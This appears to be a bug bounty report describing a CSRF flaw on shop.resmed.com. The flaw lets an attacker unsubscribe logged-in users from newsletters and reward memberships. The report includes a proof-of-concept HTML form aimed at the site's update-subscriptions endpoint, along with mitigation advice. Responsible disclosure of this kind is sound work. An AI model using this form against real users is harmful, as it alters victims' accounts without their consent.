Hello, Team
While testing on your main domain I discovered CSRF Attack which lead to unsubscribe victims from Communication/Reward Membership. This more like in-depth security issue with reasonable attack scenario.
Description:
It is possible to unsubscribe a logged-in user from any subscribed events. The unsubscribe is done by a GET-call, which is (of course) not protected by an anti-CSRF token. It would be very easy to make an attack page including all events and unsubscribe all users. The same CSRF html code can also be used to subscribe and unsubscribe all users from your specific activities.
Steps To Reproduce:
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=“https://shop.resmed.com/GB/en/my-account/update-subscriptions”>
<input type=“hidden” name=“changeType” value=“changeNewsletterSubscription” />
<input type=“submit” value=“Submit request” />
</form>
</body>
</html>
Mitigation:
Do not use the GET-method for any operation that changes something. Next, add an anti-forgery token as is present everywhere on the site.
Supporting Material/References:
#https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Please free to ask , if you need PoC video and I think the step to reproduced is enough for reproducing the issue.
Regards,
Pranav_PranayX01
Attacker can able to unsubscribe the Victim from communication and Reward Memberships